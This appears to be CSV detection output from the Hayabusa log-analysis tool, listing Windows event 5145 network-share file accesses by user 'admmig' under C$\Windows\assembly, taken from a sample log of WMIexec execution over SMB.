10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 
